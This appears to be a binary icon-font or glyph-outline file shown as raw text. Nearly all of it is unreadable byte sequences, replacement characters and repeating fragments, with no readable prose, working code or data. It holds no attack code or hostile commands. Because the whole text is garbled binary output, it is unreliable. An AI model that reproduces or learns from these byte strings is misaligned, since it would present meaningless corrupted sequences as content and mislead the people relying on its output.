`��Q88Q��Q88Q?**??**?�%� %%�%����@���+29=A3!5.54675!"3#!#!5>54&'5!2#3%>54&'#%35!35@&�6JJ6��%���%��6JJ6�&���@)77) )77)`��`� `%�Q88Q�%`��`%�Q88Q�%`��!?**??**?�����`���+:BJ_##5##5##5##5#53533533533533533##1"&'>32%.1067!510%032>10.#"1�        @@         @@ pKx..xKKx..x��><<> ><<>�@1i�rr�i21i�rr�i2�@@@@@@@@ @@@@@@@@@@ @�% %%��%T+QQ+��+QQ+|KZKKZKKZKKZK`���+:AH##5##5##5##5#53533533533533533##32671.#".1067>10&'�        @@         @@ ��/xIIx//xIIx/ SMMS SMMS�@@@@@@@@ @@@@@@@@@@ @f!!l!!��5nn5��5nn5`���+@U#5##5##5##5##33533533533533535#5#'1210#".10>"1032>10.#�        @@         @@ pr�i21i�rr�i21i�rf�a//`�ff�a//`�f�@@@@@@@@ @@@@@@@@@@ @�KZKKZKKZKKZK ANAANAANAANA`���+@##5##5##5##5#53533533533533533##"1032>10.#�        @@         @@ pr�i21i�rr�i21i�r�@@@@@@@@ @@@@@@@@@@ @@KZKKZKKZKKZK� �@';J[i�%1.5467.'13:77>71.'1.'1>7111>54&'9>7.'>54&'1.54>32#".'.'(=5 N.EVe6
B_wB 3[&-#.6(AXm<
0T")e86_'#/07�+4^PA4s>(.ZEy/:m1��?l�SS�l??l�SI�hGA(R�6,L/N:#>jM,* C}72�I&�7^E)'K" O/$0	.#6zC2�K&| 7I,(0yC�6-	'B#�P S�l??l�SS�l?1UvD� �@/>P`q.5467#*932631.5467.'#*#91>54&'17.'>54&'1.546797>54&'9�*%I�;DVd7
Gh�I=5 N.J]l;oP�3F�9!CycHBu/"T0
�&X16.(/0"?q,(3�Cz2)#.L7 DuV17R�6,L1R; �E7)!B#(-Mh>3)/O "K'(�/&5I�2?�OBKS,(0(>�Nn�C"'2E^k%14&>7.'79>7>79%'7>/&'&"6764/7''>"/&47>9%"32654&#|1G%62F#4\4$3$�4$3$�b�	<?a<���-
NT
!�c(-
G<TT<;UU;�G15&F20"�$4$3�$4$3���=@6=����
-
�!T��
.(
�T<;UU;<Tn�C'59DS%.'1#"&#&45463:3&45463:1'232654&51%%'>'"/&47>yH3U;H3T<G1A/�2F.B���IS8T
!��k�
(-

J�2H;U2I<T!1G/A�F2B.���I�b!T��l�{.(
K� �@Fe"32>54.#".54>32#"&'.#"3267>32#11.#"#"&546323267S�l??l�SS�l??l�SL�d::d�L3`RC8/1+L8!!8L+:78CR`3p?##G
.IggI$H##?@?l�SS�l??l�SS�l?�:d�LL�d:1E)!8L++L8!
)E1p)M# 
gIIg	
!#M� �@'b&.'.#"#"&546323267>7'&'.#"32>7.'.#"#".54>323267>71x?##G
.IggI$H##?GWa5S�l??l�S7eYI87:+L8!!8L+1/8_#M(/X( 
gIIg	
!
)C0?l�SS�l?4H,
!8L++L8!�``%,3%5"&51.1!09#3!5;265!+0%>1Oq*2	�3*pP��� ^B B^�� ]$�$��pP^cMLc_Pp�  `�B^^B6IJ��JH6�`` '%#!5#52651>1!013.1!30� �Pp*2	�`3*qO�$�]$�  �pP^cMLc_Pp��JI66HJ�``%,3<%5"&51.1!09#3!5;265!+0%>1#5#52653Oq*2	�3*pP��� ^B B^�� ]$�$�� @( ��pP^cMLc_Pp�  `�B^^B6IJ��JH6��� %�`` '0%#!5#52651>1!013.1!30#5#52653� �Pp*2	�`3*qO�$�]$� @( �  �pP^cMLc_Pp��JI66HJ�� %� ``(/6:>%3!53535"&51.1!01#3;265!+0%>135!5�`� `�Oq*2	�3*pP���^B B^�� ]$�$�d�����`�pP^cMLc_Pp�@�B^^B6IJ��JH6��@@`@@� ``$+%5#52651>1!013##!5.1!30��Pp*2	�`3*qO�`�@$�]$�`�pP^cMLc_Pp�`����JI66HJ ���-B#>327!#>7'!#".546712>54.#"3`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8! ���-#>323.'+>72>54.#"3`�(( �(-�(-p2WA&&AW22WA&&AW2��4�`x!�`x!�@&AW22WA&&AW22WA& ���-BL#>327!#>7'!#".546712>54.#"357'373`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+YPp  pP ��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8!�BoQ``Qo ���-7#>323.'+>72>54.#"357'373`�(( �(-�(-p2WA&&AW22WA&&AW2YPp  pP ��4�`x!�`x!�@&AW22WA&&AW22WA&�BoQ``Qo`�`ETcr�!#"&=#"&=#5354632154632!54632>323##"&'#"&=7"326=4&#!"326=4&#%"32654&#!"32654&#�`@@�@@p	
	
��	
	
@	
	
�	
	
�p0 0pp0 0p`	�		�		�		�	@	�
	
	�
	
`�`E!#"&=#"&=#5354632154632!54632>323##"&'#"&=�`@@�@@�p0 0pp0 0p*@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>7#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211"326=4&#1�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"�	
	
  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��	�		�	)@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>71#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��`	&/9CMW`lx����1'.''.'75.'1211&"#2372637*5162?1>??>71'.'1895"&#897"#979>717'1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3�	

	[	 	[	


	�!&D�D�D����`@@`$�``��� @+,@p<TT<<TT<5!	&$%" !      ! "$%&	!�
 

� ��>��`>"%%���f� g!"���` 1>1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3eD�D����`@@`$�``��� @+,@p<TT<<TT<~ ��>��`>"%%���f� g!"��`A =LYf!>/.+";267!+"&57.?>;2130&'"+*'4&#"3265#4632#"&5�	#8H((H8#	]9!9]�}`
	*H2)@T.!.T@)2G*l` 
�&%%&`

�0"'F44F'"0 +54,��

�
.BR.!/Q=##=Q/!.RB.	7jj7&&&&



�`A 0=.?>;2!;267!+"&?;2679%4&#"3265�)@T.!.T@)�qHHq�4,

`
 
&%%&�0!/Q=##=Q/!0 9GG9��

�
%%%%� �@-E`x��&'.5467>17167>7>#.7.&47"672632'11&7.'.'61&'.'.>7>76#"&'.314.#"32>5�
-"K(&"
#	: :" .>*[bf42\QC$QX_28mf_)��
	1-ULB/X*IZi:/7dVE%CDZk;8?l�SS�l??l�SS�l?�/`\X(&
&S,=p.$	)SSP''D*\`c2q':/A(8
,	/")U+0 �L)	/=K,;cP9=Qc9,4W?#	\S�l??l�SS�l??l�S� �@2Jbx�.67>54&'.1'.&67"63>32'1.'"32>7>1>7.'&#1'>7.74'1>7.47671�+gq{?7g`V%,fnv<

?s`J"Q-Ocs>$N*>r`K��@xgR*X/IU_2(�1[)#107h	0$":"?�)>'+U)(8#,
9#5 
%J$%B\7��"8?lU=$A[6�
8RkA0Q?.
&
�+-eim55�M4`+
7olh/D'+Y[\,���`�2Wj����>7.54632117'7'#".5467''7762#"&'"'&4?.546329>54&#"5#53#32654&+>7326=#";54&#".2>54.#"352>54.#"32654&#"3�%Z3B..B3Z%'D(-4:d�LL�d:4-(D'cd
#$
%/!!/% ` �O		O%<O-
	-O<%O		O%<O-
	-O<%�Fz[55[zFFz[55[zF8cJ++Jc88cJ++Jc8				_".
-.BB.-
."(D'1�HL�d::d�LH�1'D(�dc
$#
G,!//!,>  �@
	-O<%O		O%<O-		-O<%O		O%<O��5[zFFz[55[zFFz[5@+Jc88cJ++Jc88cJ+				���`�$Vi���762#"&'"'&4?.5463297#".5467''7>71.546327'7''>54&#"5#53#154632>7#"&546;.'1#"&=32#2>54.#"32654&#"3cd
#$
�-4:d�LL�d:4-(D'%Z3B..B3Z%'D(�%/!!/% ` �%<O-	
-O<%O		O%<O-	
-O<%O		�8cJ++Jc88cJ++Jc8				{dc
$#
�1�HL�d::d�LH�1'D(".
-.BB.-
."(D'y,!//!,>  �@-O<%O		O%<O-		-O<%O		O%<O-	
�+Jc88cJ++Jc88cJ+				� ``AVc54632#"&=.54671%7'7'#".54>75#53#2>54.#"32654&#"3�	
	
	'D(-4:d�LL�d:7_�I ` Cw/�Fz[55[zFFz[55[zF				��
	�3
	3�(D'1�HL�d::d�LJ�c=@  @3+��5[zFFz[55[zFFz[5@				� ``BO54632#"&=.54671%.'1535#332>54&'77'2654&#"3�	
	
	/wC ` I�_7:d�LL�d:4-(D'�				��
	�3
	3�+3@  @=c�JL�d::d�LH�1'D(��				��
#.?2654&#"31+"&=46;>74&#'*#0*1013267'p�
�

��

	��--�2<2�� �
 
�
	
���Z
Z�x ���&+"&=46;?6&/&2654&#"3��
�

��X/	

0��$�y
 q-`
	
`����`�-8NYk32+"&/7;0410*1#'7'''&6?6'4"#"7+"&=46;>74&#'*#0*1013267'HX�

�
BL�2<2VX!g	

--
�

��

	��--�	2<2�����
 
�#� �$�$,D$�
	
hZ
Z�8
 
�
	
���Z
Z�m �����_�.9+"&=46;?6&/&'7;26=4&+''&6?6t�
�

��X,	

-r-X7XA
�

�X7�,	

-X*�s
 
w-Y
	
Y�Z-n��
 
�p(Y
	
Z,���@�%.%3'''33'54.#"77754632�=d<no`?}^<=^}>`A!8L++L8!�`p��p`�gIIg[��TST@����@RP+L8!!8L+P��``````@0IggI0���@�#54.#"#7''33/3�!8L++L8!d>ss>�\`�~>&?_\=>�0+L8!!8L+0 ��VV��O` ��#1��`O#���=@M32>54.#"15->32#".546732654&'
2654&#"3�c}:d�LL�d::d�L9��@ 9Fz[55[zFFz[5kU%/!!/%P�����eG-4''44'����z)))"6
6����P



���)63->32#".546732654&'52654&#"3� ��@@(L�d::d�LL�d:jV/!!/���������'44''4)CXg�



�a.@$0<I%9#"&54675#53#%'7'77'7'77'7'772654&#"3?$/!!/%� �i	��8998988�8998988�8998988I�,!//!,ki� ��v898998989899898989989���a.@".:%535#3532654&'%'7'77'7'77'7'77?��i� %/!!/$��8998988�8998988�8998988�v �i�k,!//!,898998989899898989989��@�$0Kn���%9#"&54675#53#%'7'77'7'77546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"32654&#"3�%/!!/%� �j
�9889988�9889988��& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				��,!//!,Ki� ��V899889988998899_ &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�@��@�=Vbn{�546;232#!"&=46;32#!"&546;813!26=89535#3532654&'9%7'7''7'7''2654&#"32654&#"3�& %@

��

@  %%� %% % &@��j� %/!!/%�988998899889988)�				  &% 
 

 
 &�`%&�% &% ��V �i�K,!//!,899889988998899���				�� �"7DQ9.54>32'7#"&'12>54.#"351"&54632'2654&#"3@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5PppPPppPB^^BB^^B�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^�� � -:7#"&'11".54>32'2654&#"352654&#"3@��(b66b(�<iN--Ni<<iN--Ni<PppPPppPB^^BB^^B��`���"" -Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^�� �"7A9.54>32'7#"&'12>54.#"357'373@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5p0`p00p`0�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(�J�@��@��� � *7#"&'12>54.#"357'373@��(b66b(�<iN--Ni<<iN--Ni<p0`p00p`0��`���"" -Ni<<iN--Ni<<iN-�J�@��@����B� *4IVc'.54>32'810"9'9.'77972>54.#"351"&54632'2654&#"3�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5PppPOqqOB^^BB^^B@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^���B�'4A'17'>791".54>32'2654&#"352654&#"3�7|&\3΀|8�2\&�<iN--Ni<;iO--Oi;OqqOPppPB^^BB^^B ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^���B� *4IS'.54>32'810"9'9.'77972>54.#"357'373�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5p0`p00p`0@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(�J�@��@����B�'1'17'>792>54.#"357'373�7|&\3΀|8�2\&�;iO--Oi;<iN--Ni<p0`p00p`0 ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-�J�@��@����^�*?LY926323#".54677>772>54.#"351"&54632'2654&#"3���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5PppPOqqOB^^BB^^B-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(@pPOqqOPp ]CB^^BC]���^�%2?.'1791".54>32'2654&#"352654&#"3"���$Z2����3Y$�<iN--Ni<<hO--Oh<OqqOPppPB^^BB^^BLTH�� (NZH��( ��-Ni<;iN..Ni;<iN-`pPOqqOPp ]CB^^BC]���^�*@J926323#".54677>772>54.#"3157'373���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5p0`p00p`0-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(�I�@��@����^�&0.'1792>54.#"3157'373"���$Z2����3Y$�<hO--Oh<<iN--Ni<p0`p00p`0LTH�� (NZH��( ��-Ni<;iN..Ni;<iN-�I�@��@�` <T_c1233267>7>7#"&'.'.'"&#&!4&+"4&5461546;2#!"&=33!26=!35�
"
-2	$	]gc^B B^��qO Oq&��% 
 
�� �	.K,I@B^^B"��J6`H PppP�`%%@@

@   ` 3>B!4&+"33267>7>7#"&'"&'.'1!#!"&=35i�qO Oq%O!-2%S(?��&��%@��T93@PppP	'/�@%%@   ����!6CGKO9.#"326732654&'%5!#5#"%!#"&5467>3312#"&546357%'%%fBPp��` BfY��^BB^I7���


- �DD��DD�%%=PpP
	8`@@P=m&: B^^B:X@@



`��!llll���� -159>;35!#"&'#"&546321"32654&#357%'fB `@��pPBf%%'



  �DD��DD�=P@@`8	
PpP=%%



`��!llll	` �@8Lck�����?.54>32"67>7>7&'.041>7>7269716322>7.'>7>.'0"17>#1023:1#96'>7.77>7.72799&'.#"#36.67>54&'.9>27.'.5�!?l�SS�l?-(
	,]bf50`_^-
�/_02Q*X/$a9�.C%O2/Z+���
"&(K"-
#. ": :	>CQ\24fb[*)_fm82_XQ$�O+Y[[.T�G%PRU,+XVU*�/m<S�l??l�SF~3
*
" 
(0)j@=`"[D',@l*��.p=,S&
&(X\`/$2c`\*D''PSS)	q(A/:'8 0+U)"/	,
�^/$$$`?�@ 4Og��%>74'9'>7.'9'.74>79%.67>54&'.1'.&67"63>32'1%>7.47671>7>>7>7&'.85>27.'.5{"6-Q"<�F"#8*X/8>
�!-07/a24+gq{?7g`V%,fnv<

?s`J��	0$":"?�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�$T/8"&$T1&CK-bfh45�M,S&�)>'+U)(8#,
9#5 
%J$%B\7�7olh/D'+Y[\,��" 
*
" 
)'/$$$  @:P0'.35.'.'2&#&15065&1506561&410'32613>>10&'.1QC
*'>V]CIWWI))F[[E.4�� !}R<dH((Hd<<dH(�
	
�	��



����o	$�
  @ 7H617#0'.'.'5&150653>>10&'.19.'.'5`IW[E()IW]C')�� !}R<dH((Hd<<dH(�'*))��
	��
	
��o	$�
�
	


��@�@Fb�%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#7<54632#*#73>54&#".54>32#"&'732654&#"   )+Kk Kk�` � '7`�II�`77`�I5b)'a5BuW22WuBBuW2!$�8((88(	"%% \#=R..R=##=R.!=1PppPPp
� gG)+   � `�gGY)b5I�`77`�II�`7"!2WuBBuW22WuB5a(�(88((8 %%"
t=".R=##=R..R=#pPPppP2�@�@Flw%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#732654&#"17'7<54632#*#'7>54&#"7   )+Kk Kk�` � '7`�II�`77`�I5b)H=!.R=##=R..R=#G$�11PppPPp
138((88(5"%%`� gG)+   � `�gGY)b5I�`77`�II�`7"H#=R..R=##=R."=GK1pPPppP21(88((825%%"�`` )>KXe%1".54>32'2>54.#"351".54>32'2654&#"351"&54632'2654&#"3I�`77`�II�`77`�IBuW22WuBBuW22WuB.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7 2WuBBuW22WuBBuW2`#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%�`` )6CP%1".54>32'2>54.#"351"&54632'2654&#"352654&#"3I�`77`�II�`77`�I.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7�#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%��`�(773!267!%!#!"&5!3	7#5%1>101!067130&546101�
2�2
��;@K5�`5K@ @���Hx  ��U7�W/�$$ 5KK5�@ �� �@x8�llT�Ni]SMMzGZ��`�!#!"&5!3!1!0&54610 @K5�`5K@ @���H   xH5KK5�@ x�Tll�8x`_�@!$'5Dj%3265!#!>7.'1362!+977#5%1>101!067130&546101>7>>7>7&'.85>27.'.5�5K�� ��
	��
2}:����Hx  ��U7�W/�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &$� �� �@x8�llT�Ni]SMMzGZ�Z" 
*
" 
)'/$$$`?�@'Mb%3265!#!>297!1!0&54610>7>>7>7&'.85>27.'.5�5K�� ��
,[\^/$G"����H   xH�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &� x�Tll�8x�" 
*
" 
)'/$$$�@@  $3A]y37#130654&'#73>54&#"37#130654&'#73>54&#"1#0&546154&546320!1#0&546154&546320�>@$3Z3$[D''��>@$3Z3$[D''�@�@@ 0000 @�@�@@ 0000 @@`cCUllUCc�())(`@`cCUllUCc�())(��a��a`@0<$55$<0@`a��a`@0<$55$<0@`�@@ #1?53130654&''.54632#53130654&''.54632#��� @�@ �0000����� @�@ �0000�@@ c?a��a?c�!2552!`@@ c?a��a?c�!2552!@ ?CQ^kx�%9.5467.'#130671#0&546154&546320>32#"&'137#'3>54&#"2654&#"352654&#"32654&#"332654&#"3�
[$3Z
�@@ 0000 %/IggI#=x>@D''�<TT<<TT<				 				@				�4&B&9cCUl�a`@0<$55$<0@C7gIIg�@ ())(�T<<TT<<T�				@								@ )6CP]%1#0&546713953'.54632#1"&546322654&#"32654&#"332654&#"3��@ �/;("���0000�IggIIggI				 				@				Q	�a?ca:0R�@@`!2552!��gIIggIIg				@								� �@;?]z14132653#".505#53!#"&=35#330"32>5#535#;26?62;26=4&#!"1%2+"&/&"+"&=463!^BB^`(F]55]F(@� qOPp@�@#=R.EE.R=#   � ^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@ //B^^B ��5]F((F]5]]``PppP    .R=##=R.` ��B^RR^BIggI�T<5KQ##QK5<T� �@"@]z35#34132>5##"&50553;26?62;26=4&#!"1%2+"&/&"+"&=463!2+2&'&"63#"&=463!@�@(F]55]F(`^BB^` �^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@.B8( 9"n"9 (8B.@ ``]]5]F((F]5 ��B^^B//���PB^RR^BIggI�T<5KQ##QK5<T A/(8Q11Q8(/A��`3|���''"#*1"3!26506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>3�00(8K5`&7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>+8(5K&ZlZ??
^'
! l

		&
�

��`Gdw�1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=3!26506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#`&�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#&??
8)	���`K����''"#*1";35335335335335335326506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>31�00(8K5@ @ @ @ @ @  &7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>8(5K            &ZlZ??
F'
! l

		&
�

���`Gd��1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=;35335335335335335326506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#@ @ @ @ @ @  &�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#            &??
8)	`��`A�����''"#*1";#"&5#3!5#5326506.#"#"&#"''#"4&'.+"&'.532677'>74277'461>77'>77'>703267>79#!"&'3267>;.546;:3;2+%243267>7>300101#"&'.1'>39!!�00(8K5@�
 %��&7!HH$1��.21�

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>�`��8(5K@
% @&ZlZ??
F'
! l

		&
�

��@`��` $i��#"&5#3!5#5326506'#0#!;3!!1''1'"+;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=%>3232632#"&'0&'9@�
 &���&�n($D"��;#@ `��b!   �/a�		$P,F\  �(87�#	

$HH!7
	 H(;N@
& @&#@o31..-2
	"T#B0
21O8(	
v??
8)	`���!C3!2654&'14654&#".#"1%#!"&54671<54>32>329�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH`��� #!"&54671<54>32>321`*6^B��B^6*#=R.7^/Hg�O1B^^B1O.R=#1)eH`���!I^m}��1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<3	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`���!Wu1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg`���4Q1#!"&5467<54>32.5467>73267'>7*#"&5<5>321)*6^B��B^6*#=R.3L9		T<
Ig*6

/1p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

`��"DSbq��3!2654&'14654&#".#"9%#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!0?N]l#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#`*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!I^m|�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�P	
	
`	
	
`	
	
`	
	
`	
	
`	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	 	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`��"Xv�����9.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�A	
	
`	
	
`	
	
`	
	
`	
	
�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��5Rap��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�A	
	
`	
	
`	
	
`	
	
`	
	
pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`����"DQ^kx�3!2654&'14654&#".#"9%#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��



`



`



`



`



`����!.;HUb#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#`*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�O1B^^B1O.R=#1)eH��



`



`



`



`



`����!I^kx�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"32654&#"32654&#7"32654&#"32654&#7"32654&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�@



`



�



`



`



p	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��



`



`



`



`



@	@		@	Y.-
�		

�
-
.`����'<K[jy�����9#!"&5467<54>321>32'<54&#">329"326=4&#.2?64'14&+";265%2764/&"32654&#"32654&#7"32654&#"32654&#7"32654&##*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
Y



`



�



`



`



yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.�



`



`



`



`



`����!Wu�����1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"32654&#"32654&#7"32654&#"32654&#7"32654&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�1



`



�



`



`



�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��



`



`



`



`



`����5R_ly��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"32654&#"32654&#7"32654&#"32654&#7"32654&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�1



`



�



`



`



pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��



`



`



`



`



`����.R37#737#7##"&54671.54632>321#32654&'1.#".#"1;7"Q�/RI}1>`p0�Tl5K9*pP8[4<T)8K5��B^6*gH/^7.R=#*6^B�Q� ��@`��K5-F
	Pp:/T<

E-5K ^B1OHe)1#=R.O1B^��`����+37#7332654&'1.#".#"1;7"Q�/RI}1�B^6*gH/^7.R=#*6^B�Q� ��`^B1OHe)1#=R.O1B^��`����.Xm|���7#37#32654&'14654&#".#"1;733#"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����1FUet�7#37##"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Qq�B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����`^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����.f�7#37#32654&'14654&#".#"1;733#"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����?]7#37##"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Qq�B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����`^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����"D[s�3!2654&'14654&#".#"9%#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�
F-5KK5-E

